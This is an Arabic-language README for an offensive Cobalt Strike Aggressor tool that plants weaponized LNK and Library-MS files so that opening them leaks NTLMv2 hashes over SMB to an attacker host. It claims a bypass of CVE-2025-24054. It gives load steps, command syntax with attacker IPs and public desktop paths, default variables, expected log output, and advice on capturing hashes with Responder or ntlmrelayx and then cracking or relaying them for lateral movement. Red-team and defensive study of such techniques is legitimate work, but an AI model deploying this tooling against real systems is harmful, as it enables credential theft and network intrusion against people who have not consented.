
سكربت Cobalt Strike Aggressor يعمل على تسليح ملفات LNK و Library-MS لتفعيل كشف تجزئة NTLMv2 عبر SMB، بما في ذلك تجاوز CVE-2025-24054، لعمليات الفريق الأحمر المصرح بها.
سكريبت Aggressor شامل لـ Cobalt Strike يقوم بتسليح وتنفيذ ملفات LNK ضارة وملفات Library-MS للإفصاح عن تجزئة NTLMv2-SSP عبر SMB. يتضمن تقنيات تجاوز CVE-2025-24054.
هذه الأداة مخصصة للأغراض التعليمية والبحثية فقط. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذا الكود. استخدمها فقط على أنظمة تملكها أو لديك إذن صريح لاختبارها.
يقوم هذا السكريبت بتوليد ملفات .lnk و .library-ms مسلّحة تؤدي إلى مصادقة SBM تجاه مضيف المُشغّل عند فتحها.
لا تظهر تجزئات NTLMv2 المسربة داخل Cobalt Strike، بل يجب التقاطها بواسطة أدوات خارجية مثل Responder أو Impacket’s ntlmrelayx.py أو Inveigh التي تعمل على نظام المهاجم.
بمجرد جمعها، يمكن كسر التجزئات بـ Hashcat أو إعادة توجيهها لمزيد من الحركة الجانبية.
cobalt-strike-aggressor/
├── lnk_weaponizer.cna # Main Aggressor script (v2.0)
├── standalone_lnk_weaponizer.ps1 # Standalone PowerShell version
├── README.md # This documentation
├── INSTALL.md # Installation and setup guide
└── examples/
├── usage_scenarios.md # Practical usage examples
└── sample_targets.csv # Sample batch operation file
lnk_weaponizer.cna إلى دليل سكريبتات Aggressor في Cobalt StrikeCobalt Strike ← Script ManagerLoad واختر lnk_weaponizer.cnaانقر بزر الماوس الأيمن على أي Beacon في Cobalt Strike للوصول إلى:
# إنشاء ملف LNK بمعلمات مخصصة
lnk_create <path> <ip> <share> <file>
# مثال
lnk_create C:\Temp 192.168.1.10 share payload.exe
# إنشاء ملف Library-MS بمعلمات مخصصة
library_create <path> <ip> <share>
# مثال
library_create C:\Temp 10.10.14.22 share
# استخدام الإعدادات الافتراضية
lnk_quick
library_quick
# عرض المساعدة
lnk_help
يستخدم السكريبت القيم الافتراضية القابلة للتعديل التالية:
192.168.1.10shareC:\Tempقم بتعديل المتغيرات العامة في lnk_weaponizer.cna:
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";
.library-ms في الدليل الهدفكلا التقنيتين تنشئان ملفات:
يوفر السكريبت تسجيلاً مفصلاً:
[+] إنشاء ملف LNK على TARGET-COMPUTER
[+] UNC الهدف: \\192.168.1.10\share\payload.exe
[+] المسار المحلي: C:\Temp
[+] اكتمل تسليح LNK
[!] انتظر حتى ينقر المستخدم على ملف LNK لالتقاط تجزئة NTLM
لم يتم العثور على Beacon
رفض الإذن
سياسة تنفيذ PowerShell
bpowershell() للتعامل مع القيودفعّل الإخراج المفصّل بتعديل السكريبت:
# إضافة تسجيل تصحيح
blog($bid, "[DEBUG] تنفيذ الأمر: " . $command);
# إنشاء ملف LNK على هدف محدد
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe
# إنشاء ملف Library-MS لتجاوز CVE-2025-24054
library_create C:\Users\Public\Desktop 192.168.1.100 share
# استخدام الإعدادات الافتراضية للنشر السريع
lnk_quick
library_quick
تطبق تقنية Library-MS تجاوزاً لـ CVE-2025-24054 عبر:
هذا المشروع مقدم بحالته لأغراض تعليمية. استخدمه بمسؤولية ووفقاً للقوانين واللوائح المعمول بها.
تذكير: احرص دائماً على الحصول على التفويض المناسب قبل الاختبار على أي نظام.